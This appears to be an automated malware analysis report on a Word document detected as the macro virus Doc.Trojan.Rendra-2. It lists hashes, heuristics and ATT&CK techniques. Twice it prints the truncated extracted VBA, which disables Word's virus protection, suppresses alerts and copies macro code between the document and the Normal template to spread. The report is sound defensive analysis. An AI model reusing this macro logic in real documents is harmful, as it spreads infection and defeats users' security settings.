Office (OLE) malware analysis — malicious · 9cc1c23304b53c15

MALICIOUS

Office (OLE)

68.0 KB Created: 2001-02-14 11:15:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: cda7b6ce81632f2b1c5dbea0524b652f SHA-1: ef027fed6925e88a10daed81be32d44195d255c5 SHA-256: 9cc1c23304b53c15d0275721aa3d9b52cce31ee87bd7f408c3311c0e1fa0940a

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro, specifically a Document_Open macro, which is a common technique for executing malicious code. The presence of the 'Doc.Trojan.Rendra-2' ClamAV detection strongly suggests malicious intent. The macro's truncated code prevents a detailed analysis of its specific actions, but its presence and the heuristic firings indicate it's designed to run malicious code.

Heuristics 3

ClamAV: Doc.Trojan.Rendra-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Rendra-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 102670 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	102670 bytes
SHA-256: `88eace61f9cd86ef8123221b2a6d13dac28bf13aaed8bddc64e9e4bdd575c699`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() On Error GoTo V3VF8bKRl5nA684d Dim objet As Variant Dim objet2 As Variant Dim feuille As Variant Dim Var_Start, Var_Start2 As Long Dim Var_Count, Var_Count2 As Long Dim TempString As String Dim Date1 As Date Dim Date2 As Date Dim Date3 As Date Date1 = "03/04/2000" Date2 = "10/05/2000" Date3 = "15/09/2000" Options.VirusProtection = False Application.DisplayAlerts = wdAlertsNone Set feuille = Application.ActiveDocument Set objet = feuille.VBProject.VBComponents.Item("ThisDocument") If Not objet.CodeModule.Find("{ - This function should never be deleted - } V2", 1, 1, 1, 1) Then For i = 1 To objet.CodeModule.CountOfLines objet.CodeModule.DeleteLines 1 Next Var_Start = objet.CodeModule.CountOfLines + 1 Set objet2 = NormalTemplate.VBProject.VBComponents.Item("ThisDocument") Var_Start2 = objet2.CodeModule.ProcBodyLine("Document_Open", vbext_pk_Proc) Var_Count2 = objet2.CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc) For i = Var_Start2 + 1 To Var_Count2 + Var_Start2 - 2 TempString = RTrim(objet2.CodeModule.Lines(i, 1)) ... (truncated)

SHA-256: 88eace61f9cd86ef8123221b2a6d13dac28bf13aaed8bddc64e9e4bdd575c699

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
                                                                                                    Private Sub Document_Close()
On Error GoTo V3VF8bKRl5nA684d
                                                                                                    Dim objet As Variant
                                                                                                    Dim objet2 As Variant
                                                                                                    Dim feuille As Variant
                                                                                                    Dim Var_Start, Var_Start2 As Long
                                                                                                    Dim Var_Count, Var_Count2 As Long
                                                                                                    Dim TempString As String
                                                                                                    Dim Date1 As Date
                                                                                                    Dim Date2 As Date
                                                                                                    Dim Date3 As Date
                                                                                                    Date1 = "03/04/2000"
                                                                                                    Date2 = "10/05/2000"
                                                                                                    Date3 = "15/09/2000"
                                                                                                    Options.VirusProtection = False
                                                                                                    Application.DisplayAlerts = wdAlertsNone
                                                                                                    Set feuille = Application.ActiveDocument
                                                                                                    Set objet = feuille.VBProject.VBComponents.Item("ThisDocument")
                                                                                                    If Not objet.CodeModule.Find("{ - This function should never be deleted -  } V2", 1, 1, 1, 1) Then
                                                                                                    For i = 1 To objet.CodeModule.CountOfLines
                                                                                                    objet.CodeModule.DeleteLines 1
                                                                                                    Next
                                                                                                    Var_Start = objet.CodeModule.CountOfLines + 1
                                                                                                    Set objet2 = NormalTemplate.VBProject.VBComponents.Item("ThisDocument")
                                                                                                    Var_Start2 = objet2.CodeModule.ProcBodyLine("Document_Open", vbext_pk_Proc)
                                                                                                    Var_Count2 = objet2.CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
                                                                                                    For i = Var_Start2 + 1 To Var_Count2 + Var_Start2 - 2
                                                                                                    TempString = RTrim(objet2.CodeModule.Lines(i, 1))
                                                     
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.